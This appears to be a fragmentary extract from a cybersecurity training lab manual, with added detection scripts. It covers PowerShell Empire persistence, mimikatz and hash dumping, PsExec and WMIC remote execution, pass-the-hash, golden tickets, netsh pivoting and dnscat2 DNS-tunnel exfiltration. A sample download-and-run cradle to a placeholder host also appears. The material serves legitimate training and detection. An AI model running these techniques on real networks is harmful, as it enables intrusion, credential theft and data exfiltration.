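	sort.Strings(f.Indicators)
	return f
}

// Constructed sample: a download-and-run cradle with a placeholder URL.
const sampleScript = "IEX (New-Object Net.WebClient).DownloadString('http://listener.example/launcher')"

func main() {
	args := "-NoP -NonI -W Hidden -Enc " + EncodeCommand(sampleScript)
	f := InspectArguments(args)
	fmt.Println("decoded :", f.Decoded)
	fmt.Println("findings:", strings.Join(f.Indicators, "; "))
}
```

For the constructed sample the decoded text is the cradle itself and the findings list the hidden window, disabled profile, non-interactive and encoded-command switches plus the download-and-execute markers. The same decoding applies to the Add arguments field of any scheduled task and to the target of any .lnk file; a task whose action is powershell.exe with an encoded command and a hidden window, created outside change control and running as SYSTEM, is a strong signal on its own, before the script is even read.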
35. To test the privilege escalation and the persistence, reboot the Victim machine.
36. Once rebooted, login to the Victim machine.
37. Switch back to the Ubuntu machine.
38. As a result of the Updater scheduled task, there will be a new agent created. In Powershell
Empire, press <Enter>.
39. Type the following command to list all available agents:
list
40. The first two agents are marked in red, which means the agents are inactive:
Also take note of the new agent’s username. This agent is now running as SYSTEM instead of
Victim, which means any restrictions on the Victim machine have been successfully bypassed.
41. Rename the new agent to Victim1B and interact with it:
Note: Replace M7YF4TXW with your own agent name as identified in step 40.
42. Use the remote command prompt command to see the information about the agent:
shell hostname
shell whoami
45. You will notice that the process is now running under SYSTEM:
usemodule credentials/powerdump*
48. There are no parameters required, so we can run the module without modification:
execute
49. As the result, this module returns the hash dumps of local users from this machine:
Similar to other hash dump tools we’ve discovered in previous exercises, the user credentials are
composed of [Username:UserID:LM Hash:NTLM Hash].
50. Press <Enter> and type the command:
back
51. To access credential dumps from Active Directory, we will use the module mimikatz, which has a
function called “logonpasswords”. Use the following command to use and execute the module:
usemodule credentials/mimikatz/logonpasswords*
execute
52. The output will reveal user accounts, both local and from AD, from memory:
PRIVILEGE ESCALATION: REVEAL USER ACCOUNT CREDENTIALS FROM MEMORY USING MIMIKATZ
This shows that the server certificate has been signed by the CA "ACE202-CA."
8. Click on “OK” and close Internet Explorer.
9. Switch to the Attacker machine and open Cain & Abel, if it's not already open.
10. Click on the Start/Stop Sniffer icon to start packet sniffing.
11. Click on the Start/Stop APR icon to start ARP poisoning routing.
The status in the APR tab should change from “Idle” to “Poisoning”.
12. Switch to the Victim machine.
13. Open the Control Panel and navigate to Network and Internet > Internet Options.
14. On the Internet Options pop up, click “Delete...” in the section Browsing history.
15. Place a check on all boxes and click “Delete”:
20. Navigate to Passwords > HTTP on the left panel. Notice that HTTP has a value of (4). This means
Cain & Abel was able to sniff four (4) passwords via HTTP:
This would be normal behavior with self-signed or expired certificates. In this case, however,
it is due to a spoofed certificate.
34. Click on Continue to this website (not recommended).
35. On the address bar, click on Certificate error next to the URL:
41. Stop ARP Poisoning and the Network Sniffer using their respective icons:
cd \tools
ipconfig
If this is the first time the PsExec program is executed, an end-user license agreement from
Sysinternals will appear. Click “Agree” to continue.
Note: Refer to Appendix B.8 on page 116 for command parameters of PsExec.
5. The command prompt displays the results for the Victim machine as indicated by the IP address,
192.168.100.121:
6. Using PsExec.exe, view the contents of the root directory of the Victim machine using the
command:
8. PsExec is able to copy required executables to the target prior to execution. Run the following
command:
This command will copy “Attack.exe” to the Victim machine for remote execution (“-c”) with
elevated privileges (“-h”).
9. The command returns error code 0, which means the process did not encounter any errors:
10. Switch to the Victim machine to verify if the process was executed.
11. Open a normal command prompt, not an elevated one.
12. List the contents of the root drive:
dir c:\
13. A file called Attack.txt should be present. This file is generated by the Attack.exe process which
was remotely executed by the Attacker machine:
del c:\Attack.txt
The command will fail because access is denied. This is caused by the parameter “-h”, which
created the process with elevated permissions.
15. Open an elevated command prompt and try to delete the file again:
del c:\Attack.txt
dir c:\
The command returns with an error code 0, which means the process did not encounter any
errors.
21. Switch to the Victim machine to verify if the process was executed.
22. Using the command prompt, list the content of the root folder:
dir c:\
more C:\Attack.txt
24. The text "Successful Attack" is displayed along with the Process Owner \\NT AUTHORITY\SYSTEM:
cd \Tools\samdump2
samdump2.exe -l
28. This will dump on the screen the hashes for all existing accounts:
PsExec is able to copy executable files to the target prior to remote execution. However, if the
executable has a dependency, as is the case with samdump2, PsExec will not transfer the other
required files. Therefore we need to copy these files before running the PsExec command.
30. Execute Samdump2.exe remotely using PsExec.exe:
31. Once executed, the password hashes of all existing local accounts on the Victim machine will be
displayed on the screen:
del c:\Attack.txt
35. Open Event Viewer by clicking Start > Run > eventvwr.
36. On the left panel, expand Windows Logs > System.
37. Opening one of the last few events should show that the PSEXESVC service entered the
running state:
40. The latest audit logs will show that the Victim account was successfully logged in:
41. Click on the Details tab of the entry showing a successful login.
42. Expand System and scroll to the very bottom.
This will show that the account was logged in from the IP address of the Attacker machine,
192.168.100.111.
43. Switch back to the Attacker machine.
44. Using command prompt, delete the existing connection to the Victim machine in preparation for
the next activity:
Refer to Appendix B.9 on page 117 for parameters of the at command as well as Appendix
B.10 on page 117 for schtasks parameters.
cd \tools
3. Connect to the Victim’s admin share via SMB and transfer the Attack.exe file:
4. Using the Victim administrator account on the Victim machine, we copied the Attack.exe file
from the Attacker machine to the Windows folder of the Victim machine:
This is to confirm the current time of the virtual machine, as it might be in a different time
zone than your own.
2. Add a new job on the Victim machine, scheduled a few minutes after the current time. In the
example below, “9:04” is used, as the current time on the Victim machine is “9:02”:
3. The at command should return Added a new job with job ID = 1 if the execution was
successful:
cd \Windows\Tasks
dir
7. Wait 3-4 minutes, depending on the time you set. Once the time has elapsed, view the
contents of the root directory:
dir c:\
8. The Attack.txt file, a payload generated by the Attack.exe process, should appear on the
results:
more c:\Attack.txt
The text file contains the message "Successful Attack" with the Process Owner \\NT AUTHORITY\SYSTEM.
10. Open Control Panel and navigate to System and Security > Administrative Tools > Task
Scheduler.
11. On the left panel, select Task Scheduler Library.
12. Select At1 in the list of tasks, and open the tab “History”:
The latest entry should log the successful execution of the At1 task.
13. Open an elevated command prompt and delete the Attack.exe from “C:\Windows”:
del C:\windows\attack.exe
del c:\Attack.txt
cd \tools
4. Copy the Attack.exe file to the Victim machine's “C:\Windows” directory using the mapped
network drive R:
Using the Victim’s administrator account on the Victim machine, we copied the attack.exe file
from the Attacker machine to the Windows folder of the Victim machine.
If this is the first time you run WMIC, you will see a message indicating that WMIC is being
installed.
Note: Refer to Appendix B.11 on page 117 for further information on wmic.
2. Once finished, it will execute the command on the Victim machine and will display the
following message:
dir c:\
The Attack.txt file, which is a payload generated by Attack.exe, should appear in the file list.
5. View the content and the details of the Attack.txt file:
more c:\Attack.txt
The text “Successful Attack" is displayed along with the Process Owner.
6. Open Control Panel and navigate to System and Security > Administrative Tools > Event
Viewer.
7. On the left panel, expand Windows Logs and select Security.
8. Inspect the latest logon entries. One of them shows that the Victim account successfully
logged on from the IP address of the Attacker machine:
9. Select View > Show Analytic and Debug Logs in the main menu.
10. On the left panel, expand Applications and Services Logs > Microsoft > Windows > WMI-
Activity and select Trace. The list is currently empty, no events were logged.
Note: With the default settings of the Windows operating system, not all logging is enabled.
Therefore it is expected that the WMI-Activity Trace log is empty. This is very important to
consider, especially in investigation scenarios, as useful information might not be readily
available when needed.
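As an added defender's example (not part of the original manual), the following Python script runs detection rules over simplified Windows event records of the kind inspected in this exercise and in the PsExec and at exercises above: the PSEXESVC service being installed (System event 7045) or changing state (System event 7036), network logons (Security event 4624 with logon type 3) from hosts other than approved administrative workstations, and scheduled task creation (Security event 4698). The record layout, the EventData field names, the sample records and the approved-host address 192.168.100.10 are assumptions made for the example.

```python
"""Detection rules for the Windows event artifacts this lab inspects.

Added example, not part of the original manual. Event records are simplified
dicts {"channel", "id", "data"}; the EventData field names follow the ones
Windows uses for these events. All sample records below are constructed.
"""
from typing import Iterable

SERVICE_INSTALLED = 7045   # System: a service was installed in the system
SERVICE_STATE = 7036       # System: a service entered a new state
LOGON_SUCCESS = 4624       # Security: an account was successfully logged on
TASK_CREATED = 4698        # Security: a scheduled task was created
NETWORK_LOGON_TYPE = "3"   # LogonType 3 = network logon (SMB, PsExec, WMI)
LOCAL_SOURCES = {"-", "127.0.0.1", "::1"}


def detect(events: Iterable[dict], admin_hosts: set) -> list:
    """Return (rule, detail) findings; admin_hosts are IPs allowed to log on remotely."""
    findings = []
    for ev in events:
        eid, d = ev["id"], ev["data"]
        if eid == SERVICE_INSTALLED:
            blob = (d.get("ServiceName", "") + " " + d.get("ImagePath", "")).lower()
            if "psexesvc" in blob:
                findings.append(("psexec_service_installed", d.get("ImagePath", "")))
        elif eid == SERVICE_STATE and d.get("param1", "").upper() == "PSEXESVC":
            # 7036 message is "The %1 service entered the %2 state."
            findings.append(("psexec_service_state", d.get("param2", "")))
        elif eid == LOGON_SUCCESS and d.get("LogonType") == NETWORK_LOGON_TYPE:
            src = d.get("IpAddress", "-")
            if src not in LOCAL_SOURCES and src not in admin_hosts:
                findings.append(("network_logon_from_unexpected_host",
                                 f"{d.get('TargetUserName')}@{src}"))
        elif eid == TASK_CREATED:
            findings.append(("scheduled_task_created", d.get("TaskName", "")))
    return findings


ADMIN_HOSTS = {"192.168.100.10"}   # constructed: the only approved admin workstation

SAMPLE_EVENTS = [   # constructed records
    {"channel": "System", "id": 7045,
     "data": {"ServiceName": "PSEXESVC", "ImagePath": "%SystemRoot%\\PSEXESVC.exe"}},
    {"channel": "System", "id": 7036,
     "data": {"param1": "PSEXESVC", "param2": "running"}},
    {"channel": "Security", "id": 4624,
     "data": {"TargetUserName": "Victim", "LogonType": "3",
              "IpAddress": "192.168.100.111", "AuthenticationPackageName": "NTLM"}},
    {"channel": "Security", "id": 4624,
     "data": {"TargetUserName": "helpdesk", "LogonType": "3",
              "IpAddress": "192.168.100.10", "AuthenticationPackageName": "Kerberos"}},
    {"channel": "Security", "id": 4624,
     "data": {"TargetUserName": "Victim", "LogonType": "2", "IpAddress": "-"}},
    {"channel": "Security", "id": 4698,
     "data": {"SubjectUserName": "Victim", "TaskName": "\\At1"}},
]

if __name__ == "__main__":
    for rule, detail in detect(SAMPLE_EVENTS, ADMIN_HOSTS):
        print(f"{rule:40} {detail}")
```

On the constructed records the script raises four findings: the PSEXESVC install and state change, the network logon of Victim from 192.168.100.111, and the creation of the At1 task; the logon from the approved workstation and the interactive logon are left alone. The WMI-Activity trace log discussed in the note above would add nothing here unless it has been enabled beforehand, which is exactly why the Security and System channels are the ones to baseline.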
2. When prompted about enabling and clearing the log, press <y>:
del c:\Windows\Attack.exe
del c:\Attack.txt
cd \tools
4. Add the new user harry to the Victim machine's administrators group:
5. Check if you can FTP to the Server machine by using the command:
ftp 192.168.100.131
6. The results show that you are not allowed to use FTP on the remote host:
With the above command, we create a port forwarding rule on the Victim, which redirects
any incoming connection on port 2121 to port 21 of the Server machine.
Note: Refer to Appendix B.12 on page 118 for more information on the netsh command.
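As an added defender's example (not from the manual), the following Python script parses the output of “netsh interface portproxy show all” and flags forwarding rules that are not on an allow-list, which is how a pivot like the one configured in this step would be found on a host during an investigation. The sample output is constructed in the layout netsh prints; the regular expression and the allow-list are assumptions of the example.

```python
"""Audit of netsh portproxy rules (added example, not part of the lab manual).

Parses the table 'netsh interface portproxy show all' prints and compares each
listener/target pair against an allow-list. Persistent rules are also stored
under HKLM\\SYSTEM\\CurrentControlSet\\Services\\PortProxy, so a registry
baseline is a second place to look. The sample output below is constructed.
"""
import re

# Constructed sample in the layout netsh prints; the rule mirrors the lab's
# pivot (listen on 2121, forward to the Server's port 21).
SAMPLE_OUTPUT = """
Listen on ipv4:             Connect to ipv4:

Address         Port        Address         Port
--------------- ----------  --------------- ----------
*               2121        192.168.100.131 21
"""

# A rule line is: <listen address> <listen port> <connect address> <connect port>
_RULE = re.compile(r"^\s*(\S+)\s+(\d+)\s+(\S+)\s+(\d+)\s*$")


def parse_portproxy(text: str) -> list:
    """Return (listen_addr, listen_port, connect_addr, connect_port) tuples."""
    rules = []
    for line in text.splitlines():
        m = _RULE.match(line)
        if m:   # header and separator lines never match (non-numeric ports)
            rules.append((m.group(1), int(m.group(2)), m.group(3), int(m.group(4))))
    return rules


def unexpected_rules(rules: list, allowed: set) -> list:
    """Rules that are not explicitly approved; on a workstation this is usually all of them."""
    return [r for r in rules if r not in allowed]


if __name__ == "__main__":
    found = parse_portproxy(SAMPLE_OUTPUT)
    for rule in unexpected_rules(found, allowed=set()):
        print("unexpected portproxy rule:", rule)
```

On a workstation the approved set is normally empty, so every rule found is worth a ticket; the listener address "*" is the wildcard netsh shows when a rule accepts connections on all interfaces.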
9. Each of the PsExec.exe commands should return error code 0 when completed.
10. Use the following 2 commands to connect to port 2121:
ftp
open 192.168.100.121 2121
We have configured this port to forward traffic to port 21 of the Server machine.
The Attacker machine is now allowed to connect to the Server FTP, as the Server sees the
traffic coming from Victim, rather than the Attacker machine.
11. Provide the following credentials to the FTP:
Username: FtpUser
Password: FtpPass
quit
4. Close the error message and switch back to the elevated command prompt.
5. Still in the “C:\Tools” directory, enable RDP access remotely on Victim via the command:
The above command uses PsExec to manipulate registry entries on the target machine,
specifically the “fDenyTSConnections” key.
6. Add a firewall exception for RDP:
REMOTE RDP: MANIPULATING REGISTRY KEYS AND ADVFIREWALL SETTINGS WITH PSEXEC
8. Switch back to the RDP Client and try to connect again to the Victim machine on
192.168.100.121.
This time, a prompt will ask for login credentials. Specify the credentials for the Victim user.
9. When prompted about the identity of the remote computer and the validation of the
certificate, click on “Yes”:
Optionally, the Don't ask me again… check box can be enabled to prevent this notification in
the future.
This will start a Remote Desktop session to the Victim machine and proves that our remote
execution using PsExec was successful.
10. Close the RDP client.
Note: The use of wce is limited to a certain set of operating systems. When used in environments
with newer versions of Windows, such as Windows 10 and Windows 2012, wce might not work
as expected. Alternative tools, such as the mimikatz framework, can be utilized instead.
Refer to Appendix B.13 on page 118 for information about wce parameters.
x:
cd \tools
gsecdump-v2b5.exe -s > hashes.txt
c:
net use x: /delete
cd \tools
notepad hashes.txt
8. The information in the text file is stored in the following sequence:
9. Highlight the LM and NTLM hash only for the account ACE202\Victim and copy it to the
clipboard:
cd wce_v1_41beta_universal
wce -w
12. This command will display the username and the cleartext password of the account that is
currently logged on:
13. Attempt to access the content of the C: drive of the Victim machine remotely without specifying
a user account:
dir \\192.168.100.121\C$
As no user was specified, this command uses the credentials of the user currently logged in.
As that user has no permissions on the Victim machine, the “dir” command fails.
14. Use wce to change the NTLM credentials of the current command prompt window:
Ensure that you replace “[LM Hash]:[NTLM Hash]” with the contents of your “hashes.txt” taken in
step 9.
The above command changes the NTLM credentials, but this is only valid for the command prompt
window wce is started in.
15. Once executed, wce will return the message NTLM credentials successfully changed:
16. Verify that the new NTLM credentials allow you to query the contents of the C: drive of the
Victim machine remotely:
dir \\192.168.100.121\C$
17. By replacing the NTLM credentials of the current logon session, the dir command is now
successful:
18. Execute the Attack.exe file remotely on Victim using PsExec.exe, this time without specifying a
user or password:
cd..
PSTools\PsExec.exe \\192.168.100.121 -c Attack.exe
19. Verify if the process was executed properly by looking for the generated Attack.txt file
remotely:
dir \\192.168.100.121\C$
more \\192.168.100.121\C$\Attack.txt
21. The results will show that the process was executed by the ACE202\Victim account. This proves
that the Pass-The-Hash technique was successfully utilized:
22. List the logon sessions and NTLM credentials locally using wce:
cd wce_v1_41beta_universal
wce -l
23. This will list all logon sessions, which now also includes the Victim account:
del c:\Attack.txt
29. Enter the IP address of the Attacker machine, 192.168.100.111, on both the Server name and
Connection name fields.
Enter the logon information of the Administrator and click “OK”:
30. Double-click on the newly created Remote Desktop connection on the left panel.
31. Using the Administrator account to connect to the Attacker machine creates a logon session on
the target. Do not click “Yes”.
32. Leave the Remote Desktop connection window open and switch to the Attacker machine.
33. On the command prompt, list the logon sessions and NTLM credentials again using wce:
wce -l
37. Execute the Attack.exe file remotely on the Victim machine using PsExec.exe:
cd..
PSTools\PsExec.exe \\192.168.100.121 -c Attack.exe
38. Verify if the process was executed properly by displaying the contents of Attack.txt:
more \\192.168.100.121\C$\Attack.txt
The results show that the process was executed by the Administrator account.
39. Reboot the Attacker machine in preparation of the next exercise.
Golden Tickets for the domain can be obtained using the NTLM hash of the Key Distribution Service
account, KRBTGT. This account allows generation of TGTs for any account in Active Directory.
1. Access Attacker machine.
2. Open command prompt and run the following command:
pushd \\Server\C$
The pushd command accepts either a network path or a local drive letter and path. If a network
path is specified, pushd will create a temporary drive pointing to the specified network resource
and will change into the temporary drive.
3. The pushd command fails, as we currently have no access rights:
4. We will need the SID of the KRBTGT service account. Run the following commands:
5. This will open notepad, displaying the Object Security ID of the KRBTGT service account:
Highlight the SID as shown in the screenshot. Do not close Notepad, as we require the SID during
the exercise.
6. In the command prompt, navigate to “C:\Tools”:
cd \tools
notepad hashes.txt
Highlight the NTLM hash of user krbtgt(current-disabled). Leave the Notepad open, as we
require the contents for the next steps.
8. Back in the command prompt, navigate to the “Mimikatz” folder and start mimikatz.exe:
cd mimikatz\x64
mimikatz.exe
Note: Refer to Appendix B.14 on page 119 for a list of command examples in mimikatz.
10. Golden tickets can be created for valid domain accounts or for accounts that do not exist. We can
now paste the information we gathered earlier:
User is used for the name of the user account the ticket will be created for. This can be an
existing account name, but it does not have to be.
rc4 is the NTLM hash, using the highlighted value from step 7.
SID will insert a SID into the SIDHistory attribute of the account in the ticket. This is useful to
authenticate across domains. This uses the SID value from step 5, without the last 4 characters.
ID for the RID of the account you will be impersonating, here we use the default administrator ID
of 500.
Using ptt injects the created ticket into the current session.
Note: Please ensure the “rc4” and “sid” values are the same as those discovered in the Notepad
windows in steps 5 and 7. If not, please change those values accordingly.
11. Once executed, Mimikatz will show the following screen, indicating that the Golden ticket has
been successfully submitted:
12. The generated golden ticket can now be used. Launch a command prompt using the following
command:
misc::cmd
whoami
pushd \\Server\c$
Notice that we automatically switched to drive Y:. This is done by the pushd command, which
created the connection and temporarily mapped it to a new drive letter.
16. Navigate into Windows’ database directory:
cd windows\ntds
dir
18. This will return the command prompt from Server onto the Attacker machine. Type in the
following commands to check for their values:
hostname
whoami
ipconfig
Hostname will be Server, as the command prompt is running on the Server machine. This is also
the reason why ipconfig returns 192.168.100.131.
More important, however, is the output of the command “whoami”. The current user has changed
to the fake user we created in step 10, krbtgthacker.
Even though the user does not exist, we were still able to list a system directory in step 16, which
proves we have Administrator rights, thanks to the RID of 500 (see step 10).
Note: In summary, if the SID and NTLM hash of the KRBTGT service account can be acquired, it is
very easy to gain access and elevate the privileges of an unknown user.
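The observations above are also what a defender can check for: a successful logon for an account name the directory does not contain, a ticket whose RID (here 500) belongs to a different account than the name it carries, and a SID from a foreign domain. The following Python script is an added example, not part of the original manual or of mimikatz; it compares 4624-style logon records (TargetUserName and TargetUserSid) with a snapshot of the domain's accounts. The domain SID, the account list and the logon records are constructed. It also shows the general way to split a SID into domain part and RID: the "drop the last 4 characters" instruction in step 10 only works because the krbtgt suffix "-502" happens to be four characters long.

```python
"""Forged-ticket indicators in successful logon records.

Added example, not part of the original manual. Compares 4624-style records
against a directory snapshot. Domain SID, directory and records are constructed.
"""
import re

_DOMAIN_ACCOUNT_SID = re.compile(r"^S-1-5-21-\d+-\d+-\d+-\d+$")


def split_sid(sid: str):
    """Return (domain SID, RID) by splitting at the last hyphen."""
    if not _DOMAIN_ACCOUNT_SID.match(sid):
        raise ValueError(f"not a domain account SID: {sid!r}")
    domain, rid = sid.rsplit("-", 1)
    return domain, int(rid)


def check_logons(events: list, directory: dict, domain_sid: str) -> list:
    """directory maps sAMAccountName -> RID; returns (rule, account name) findings."""
    names = {n.lower() for n in directory}
    rid_to_name = {rid: n.lower() for n, rid in directory.items()}
    findings = []
    for ev in events:
        name, sid = ev["TargetUserName"], ev["TargetUserSid"]
        dom, rid = split_sid(sid)
        if dom != domain_sid:
            # A SID of another domain in our own logon records: review SIDHistory and trusts.
            findings.append(("foreign_domain_sid", name))
            continue
        if name.lower() not in names:
            # Kerberos accepted a ticket for an account the directory does not know.
            findings.append(("account_not_in_directory", name))
        if rid in rid_to_name and rid_to_name[rid] != name.lower():
            # The RID (for example 500) belongs to a different account than the name carried.
            findings.append(("rid_name_mismatch", name))
    return findings


DOMAIN_SID = "S-1-5-21-1111111111-2222222222-3333333333"            # constructed
DIRECTORY = {"Administrator": 500, "Guest": 501, "krbtgt": 502, "Victim": 1105}  # constructed

SAMPLE_LOGONS = [   # constructed 4624-style records
    {"TargetUserName": "Victim", "TargetUserSid": DOMAIN_SID + "-1105"},
    {"TargetUserName": "krbtgthacker", "TargetUserSid": DOMAIN_SID + "-500"},
    {"TargetUserName": "Administrator",
     "TargetUserSid": "S-1-5-21-9999999999-8888888888-7777777777-500"},
]

if __name__ == "__main__":
    for rule, account in check_logons(SAMPLE_LOGONS, DIRECTORY, DOMAIN_SID):
        print(f"{rule:26} {account}")
```

On the constructed records the Victim logon is clean, the krbtgthacker logon is flagged twice (unknown account, RID 500 carried under a different name), and the Administrator logon is flagged for its foreign domain SID. The lasting mitigation the summary note implies is to change the KRBTGT password twice, since tickets forged with the old hash stay valid until both the current and the previous key have been replaced.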
Final Challenge
In the final challenge for Advanced Threat Defense - Cybercrime Operations & Attack
Methodologies, the student will demonstrate the ability to:
• Infiltrate a target environment
• Exfiltrate documents
100 © 2019 Trend Micro Inc. Confidential - Release Pursuant to NDA - Confidential
Task
The final challenge consists of two tasks:
• Infiltrate a target network
• Exfiltrate an important document
Environment
The final challenge uses a new environment:
Background Information
In this exercise, you will be playing the role of a hacker named Harry. Your goal is to look for and
collect important documents from your previous employer who just recently fired you.
Advanced Threat Defense - Cybercrime Operations & Attack Methodologies
Based on the information you have read from the email, George is making last minute changes to
his presentation using data that he's requesting from outsourced developers. These outsourced
developers are using the email address “Instructor@ACE202.TrendMicro” to communicate with.
George also mentioned that he urgently needs the updated version of the "ACE202.Exercise.doc"
file; he will be monitoring his email from the time he sent the email up to one hour prior to his
presentation. He also requested that they use "ACE-202 Exercise" as the subject so he can
immediately spot the email.
Prior to this, since you have worked for this company before, you know the following:
• You know of five computers that you can utilize for this operation.
• The mail server’s IP address is 192.168.33.91.
• Servers of this organization are isolated in their own subnet (192.168.33.0/24).
These servers cannot be accessed from the Internet directly except for the SMTP mail server.
However, George's computer can access a computer named SRV-Door on the server subnet.
• The server, where important documents are stored, is SRV-Doc. This server also belongs to
the same subnet as that of the SRV-Door.
• On the same subnet of the servers is a domain controller, SRV-DC, whose user frequently
connects to the SRV-Doc to upload important files.
Objectives:
Use any of the techniques you've learned from this course to infiltrate the target user's
machine using the resources you have.
• Gain access to George's machine.
• Copy your hacking tools to the infected machine.
Guide Questions:
What is the best point of entry knowing that you have the following at your disposal:
• Email address, name, and IP address of an employee
- Email: George@ACE202.TrendMicro
- Name: George
- IP Address: 172.22.22.61
• Critical information and "human" vector that can be exploited
- George is waiting for an "ACE202.Exercise.doc" file
• Trojan backdoor that grants remote access to an attacker
- Trojan: C:\Tools\replace-sethc-with-cmd.exer
You know there are important documents stored on SRV-Doc, particularly a DOCX file. You will
need to find a way to get to the SRV-Doc machine in order to get that specific DOCX file, whose
name and location are currently unknown.
There are three computers in the internal network. Since you have worked for this company
before, you know one of your ex-colleagues uses the SRV-DC machine to constantly access the
SRV-Doc machine.
Objectives
Use any of the techniques you've learned from this course to infiltrate the organization's network
and retrieve the DOCX file from the SRV-Doc document server:
• Assume George's identity to gain access to the other resources on the network:
- Sniff for passwords
- Use hash passing
• Gain access to the SRV-Door and/or the SRV-Doc machines:
- Determine if George has access to the machines you want to infiltrate; or
- Assume the identity of other people who have access to the resources you need; or
- Create user accounts that have the credentials you need.
• Copy document files from the SRV-Doc machine and determine which ones are useful.
Guide Questions:
• With access to George's machine, what information can be compromised using your hacking
tools?
- Can you retrieve passwords?
- Do you have ready access to other resources on the network?
• By exploring your options, what errors or roadblocks did you encounter?
Are these errors easily bypassed or solved using any of the techniques you've learned?
Optional Activities
DNS Tunneling
This optional activity demonstrates how to utilize DNS tunneling.
The important point here is that IP traffic of any nature can be encapsulated within the DNS
protocol. This allows attackers to hide their communication, such as C&C, lateral movement
activities or data exfiltration, and ensures it is not easily detected by their targets.
For this exercise we will utilize the tool dnscat2 to create a DNS tunnel and perform internal
reconnaissance and data exfiltration.
Note: Refer to Appendix B.15 on page 119 for further dnscat2 command and parameter examples.
With this command, the systemd-resolved service (the Network Name Resolution Manager) is
disabled, which allows the dnscat2 server to bind to the DNS port.
4. Navigate to “dnscat2/server” folder:
cd dnscat2/server
5. Start dnscat2 server and connect to the domain name supplier.tm. Type the command:
cd Desktop\Exercise\dns_tunneling
dnscat2.exe supplier.tm
10. This will execute dnscat2 with the established domain name to create a session:
Note: If you encounter issues establishing a connection, such as “Too big”, please ensure the DNS
server service on the server machine is running.
The line New window created: 1 indicates that a new session has been established.
The dnscat2 UI calls its sessions “windows”. The default window is called the 'main' window.
13. Type the following command to get a list of all available windows:
window
14. You'll note that there are two windows: window 0 is the main window, and window 1 is the
listener (technically referred to as the “tunnel driver”).
15. From any window that accepts commands (main and command sessions), you can type help to
get a list of commands:
help
16. Use the window command to interact with window 1, which is the established session with the
Victim machine:
window -i 1
download finance.txt
Note: dnscat2 will only be able to download files which are located in the same folder as the
dnscat2 client. If you wish to download files currently located in the “Downloads” folder, you
will either need to execute dnscat2 from that directory or move the files into the dnscat2
directory using a shell.
18. The dnscat2 console on Ubuntu will display the success of the download:
19. The download can also be seen on the dnscat2 console on the Victim machine:
cat dnscat2/server/finance.txt
shell
26. Once executed, press <CTRL>+<Z> followed by <ENTER> to go back to the main window of
dnscat2.
window
The [*] marker means that there has been activity in that window since the last time we looked
at it.
29. Interact with the newly created session:
window -i 2
30. Run the following commands to confirm whether the shell is executed on the Victim machine:
whoami
ipconfig
31. Both commands will return information about the Victim machine:
32. Go back to the main window of dnscat2 by pressing <CTRL> + <Z> followed by <ENTER>.
33. Switch to the Victim machine.
34. Open Wireshark. We can confirm, by analyzing the recorded packets, that all activities between
dnscat2 client and server were encapsulated within the DNS protocol:
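The Wireshark observation above, that every exchange between client and server is carried inside DNS queries, is also what a defender turns into a detection: tunnel tools encode their payload into subdomain labels, so one domain receiving many long, hex-looking subdomains that hardly ever repeat stands out from normal name resolution. The following Python script is an added example, not part of the original manual or of dnscat2: it scores a DNS query log per registered domain and flags the ones matching that profile. The log format, its lines (including the supplier.tm domain used in this exercise and the Victim's address as the client) and the thresholds are constructed assumptions; taking the last two labels as the registered domain is a simplification.

```python
"""Scores DNS query logs for tunnelling indicators.

Added example, not part of the original manual or of dnscat2. The log format
and the sample lines are constructed; thresholds are assumptions to be tuned
against a real baseline.
"""
import math
import re
from collections import defaultdict

_HEX_LABEL = re.compile(r"^[0-9a-f]{8,}$")


def shannon_entropy(s: str) -> float:
    """Bits per character of a label; encoded payload scores higher than words."""
    if not s:
        return 0.0
    counts = {c: s.count(c) for c in set(s)}
    return -sum(n / len(s) * math.log2(n / len(s)) for n in counts.values())


def split_name(qname: str):
    """Return (registered domain, subdomain labels); last two labels = domain."""
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-2:]), labels[:-2]


def parse_query_log(text: str) -> list:
    """Constructed format: '<time> <client> <qtype> <qname>' per line."""
    queries = []
    for line in text.splitlines():
        if line.strip():
            _, client, qtype, qname = line.split()
            queries.append((client, qtype, qname))
    return queries


def score_domains(queries: list) -> dict:
    """Per-domain metrics: query count, uniqueness, label length, hex share, entropy."""
    acc = defaultdict(lambda: {"q": 0, "names": set(), "labels": 0,
                               "chars": 0, "hex": 0, "entropy": 0.0})
    for _, _, qname in queries:
        dom, subs = split_name(qname)
        a = acc[dom]
        a["q"] += 1
        a["names"].add(qname)
        for lab in subs:
            a["labels"] += 1
            a["chars"] += len(lab)
            a["hex"] += bool(_HEX_LABEL.match(lab))
            a["entropy"] += shannon_entropy(lab)
    out = {}
    for dom, a in acc.items():
        n = a["labels"] or 1
        out[dom] = {"queries": a["q"],
                    "unique_ratio": len(a["names"]) / a["q"],
                    "avg_label_len": a["chars"] / n,
                    "hex_fraction": a["hex"] / n,
                    "avg_entropy": a["entropy"] / n}
    return out


def suspicious_domains(queries: list, min_queries: int = 3) -> list:
    """Domains whose subdomains look like encoded payload rather than host names."""
    flagged = []
    for dom, m in score_domains(queries).items():
        if (m["queries"] >= min_queries and m["avg_label_len"] >= 20
                and m["hex_fraction"] >= 0.5 and m["unique_ratio"] >= 0.8):
            flagged.append(dom)
    return flagged


# Constructed log: ordinary lookups, then tunnel-style TXT/CNAME/MX queries.
SAMPLE_LOG = """\
12:00:01 192.168.100.121 A www.example.com
12:00:02 192.168.100.121 A mail.example.com
12:00:03 192.168.100.121 AAAA cdn.example.com
12:00:04 192.168.100.121 A api.example.com
12:00:05 192.168.100.121 TXT 7f3a9c2e1b0d4e6f8a1c3e5b7d9f1a2c4e6a8c0e.supplier.tm
12:00:06 192.168.100.121 CNAME 0b1d3f5a7c9e2468ace02468ace013579bdf1357.supplier.tm
12:00:07 192.168.100.121 MX 9e8d7c6b5a4f3e2d1c0b9a8f7e6d5c4b3a2f1e0d.supplier.tm
12:00:08 192.168.100.121 TXT 1234abcd5678ef901234abcd5678ef901234abcd.supplier.tm
12:00:09 192.168.100.121 CNAME a1b2c3d4e5f60718293a4b5c6d7e8f9012345678.supplier.tm
"""

if __name__ == "__main__":
    for dom, m in score_domains(parse_query_log(SAMPLE_LOG)).items():
        print(dom, {k: round(v, 2) for k, v in m.items()})
    print("suspicious:", suspicious_domains(parse_query_log(SAMPLE_LOG)))
```

On the constructed log only supplier.tm is flagged: its five queries carry 40-character hex labels that never repeat, while example.com's short host names score zero on the hex and length metrics. A real deployment would also split the view per client, since the sender of tunnel traffic is the host to look at next.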
kill 2
window
window -i 1
shutdown
Commands & Parameters
Netcat
Netcat offers multiple parameters for specific actions:
Parameter Description
-l Listen mode (default: Client)
-L Listen harder; only supported on Windows OS. This will force netcat to continue listening after a client disconnects.
